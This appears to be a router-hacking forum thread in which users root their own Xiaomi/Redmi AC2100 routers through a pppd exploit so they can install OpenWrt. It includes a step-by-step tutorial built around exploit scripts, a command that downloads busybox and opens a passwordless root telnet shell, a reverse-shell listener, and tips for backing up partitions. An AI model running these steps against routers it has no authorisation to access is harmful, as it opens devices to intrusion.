New Xiaomi Router AC2100

Hello @patrickm

It might even work for AX3600 as the firmware version it has is 1.0.20

The pppd may be exploitable in the same way but the script will not work, AX3600 is ARM based not MIPS

Thank you @namidairo for exploit! :slightly_smiling_face: I tested on Redmi AC2100, bootloader breed-mt7621-xiaomi-r3g.bin and i can confirm is working.


All firmware from Xiaomi Mi3G is working, i tested Pandora, Padavan and OpenWRT, except 5Ghz band and of course the missing USB.

Yeah... The only reason that would vaguely work is because of the similar flash layout.

Please don't flash mir3g images. It's likely one of your lan ports isn't initialised, and your led setup will be all wrong. (And the whole not having the 7615 working)

1 Like

I'd be pleasantly surprised if it did work on the R2100 as well, as I have hardcoded addresses to rop gadgets, sleep and the stack.

Hi. Where can I find proper images for it:
openwrt-ramips-mt7621-xiaomi_redmi-router-ac2100-squashfs-kernel1.bin
openwrt-ramips-mt7621-xiaomi_redmi-router-ac2100-squashfs-rootfs0.bin

Because thorsten97 link
https://gofile.io/?c=LWjyIx is not working.

You still can download the 1.0.11 OFW.

Can you try port it to MiWiFi AX3600? For most WiFi 6 router, have one shell is better than nothing.

To make the exploit a bit easier I made a script simulating a PPPoE server. I tested it on Windows and Linux with the RM2100 router and it was able to successfully set up the connection. I only tried the reboot exploit and it successfully triggers it. If anyone could try it with the black cylinder and see if it works with the reverse shell I would be thankful :grinning:
EDIT: If your router mac address doesn't start with 88:c3:97 (mine starts with 8c:53:c3) the exploit script might send the package the wrong way. In that case you have to switch dst an src or hardcode your mac address @namidairo any idea if this could be fixed?

1 Like

It should be possible to get router MAC from the PADI packet.

To make it really easy it would be nice to use only the WAN port, so i'm going to try to setup a working PPPoE connection for accessing the shell. But i have to figure out how to change exploit payload first :P.

The PADI doesn't contain the necessary Session ID (Could be hardcoded in my script) and if the exploit triggers to early it doesn't respond to the MD5 Challenge.
Yeah would be great if it would work with WAN port only. I'm currently helping someone with the setup and wrote a small tutorial how to do it with WAN + Android phone^^ Since I'v already written it I'll attach it if anyone is interested.

On Android:

  • Download "NetTools" and "Simple-HttpServer"
  • In NetTools check Listen and enter 31337 for Port
  • In Simple-HttpServer go to Setting and set the Document Root to "/storage/emulated/0/Download"
  • Use your browser to download busybox-mipsel from here: https://busybox.net/downloads/binaries/1.21.1/
  • Put this into your clipboard: wget http://192.168.31.177:12345/busybox-mipsel -O /tmp/busybox && chmod a+x /tmp/busybox && /tmp/busybox telnetd -l /bin/sh
  • Change your Wifi to the Xiaomi one and edit your Ip to 192.168.31.177
  • Go to 192.168.31.1 and make sure you set your Internet settings to PPPoE, Automatic configuration with user "a" and password "a"
  • In Simple-HttpServer make sure it says http://192.168.31.177:12345/ at the top and switch the button to on
  • Go to NetTools and press listen at the bottom
    On PC:
  • Enter your Interface name into both scripts
  • Replace "88:c3:97" in "src.startswith("88:c3:97")" with the first halve of your router mac address
  • Start pppd-cve.py and PPPoE_Simulator.py
  • Restart pppd-cve.py until you get a Connected on NetTools
    On Android:
  • Paste "wget http://192.168.31.177:12345/busybox-mipsel -O /tmp/busybox && chmod a+x /tmp/busybox && /tmp/busybox telnetd -l /bin/sh" from your clipboard
    On PC:
  • Connect your PC to one of the LAN ports
  • If everything worked, you can now use Putty to connect to telnet on 192.168.31.1 without a password
1 Like

Hi Percy, great work! One question... Can I directly modify the Mac ID in the script ?
' if src.startswith("88:c3:97") :
src,dst = dst,src '
change to
' if src.startswith("8c:53:c3") :
src,dst = dst,src'

You could remove this:

    dst = (packet['Ethernet'].dst)
    src = (packet['Ethernet'].src)
    # In case we pick up Router -> PPPoE server packet
    if src.startswith("88:c3:97") :
        src,dst = dst,src

and replace it with

    dst = "aa:bb:cc:aa:bb:cc" # Router mac
    src = "dd:ee:ff:dd:ee:ff" # Server mac

I got telnet to device with method written by @Percy. Verrry thanks to him. Before flash firmware based RedmiAc2100. I want to backup all partitions of my XiaomiAC2100. Maybe in future. I need to get files from original one. And @thorsten97 wants original kernel I want to help him too. Can somebody help me to backup all things at telnet. Or can share a tutorial for me??

Thank your for your work. I have a Xiaomi Ac2100 and I've encountered an error following your guide.
A telnet can be successfully established, however after pasting wget http://192.168.31.177:12345/busybox-mipsel -O /tmp/busybox && chmod a+x /tmp/busybox && /tmp/busybox telnetd -l /bin/sh, the Netcat on android kept saying that wget http://192.168.31.177:12345/busybox-mipsel -O not found, I'm pretty sure I have done everything right, the http server was on, bin file has been downloaded to Download ....
so what can I do to solve this problem ? :sob: :sob: :sob:

it turns out that the directly copied url_link http://192.168.31.177:12345 from " wget http://192.168.31.177:12345/busybox-mipsel -O /tmp/busybox && chmod a+x /tmp/busybox && /tmp/busybox telnetd -l /bin/sh" is wrong. the link should be copied from android brower in my case. ...
confirm this exploit works on cylinder AC2100 !
Many Thanks to namidairo and Percy !!!
you are awesome !!!

BTW,
the telnet port is 23

  1. After dd backup, use tftp transfer it to your computer.
  2. wget openssh-server and openssh-sftp-server package and install it, then transfer file by sftp.

Can you help to which devs I need to backup? Or which path I need to DD?

Check partition layout with :

cat /proc/mtd

In my case:

BusyBox v1.31.1 () built-in shell (ash)

  _______                     ________        __
 |       |.-----.-----.-----.|  |  |  |.----.|  |_
 |   -   ||  _  |  -__|     ||  |  |  ||   _||   _|
 |_______||   __|_____|__|__||________||__|  |____|
          |__| W I R E L E S S   F R E E D O M
 -----------------------------------------------------
 OpenWrt SNAPSHOT, r13060-471b8bf8c1
 -----------------------------------------------------
root@Belkin:~# cat /proc/mtd
dev:    size   erasesize  name
mtd0: 00040000 00010000 "u-boot"
mtd1: 00010000 00010000 "u-boot-env"
mtd2: 00e20000 00010000 "rootfs"
mtd3: 00b60000 00010000 "rootfs_data"
mtd4: 00160000 00010000 "kernel"
mtd5: 00010000 00010000 "nvram"
mtd6: 00010000 00010000 "envram"
mtd7: 00010000 00010000 "art"
mtd8: 00f80000 00010000 "firmware"

To backup the firmware partition, mtd8, I would use:

dd if=/dev/mtd8 of=/tmp/firmware.backup.bin

This would create the backup .bin file in the tmp directory.

Thank you a lot. It really helped much. Can you help me on copying backup images from router? I cannot manage to start sftp or ssh server. I just have telnet with official firmware. I want to backup some
partitions before flash openwrt.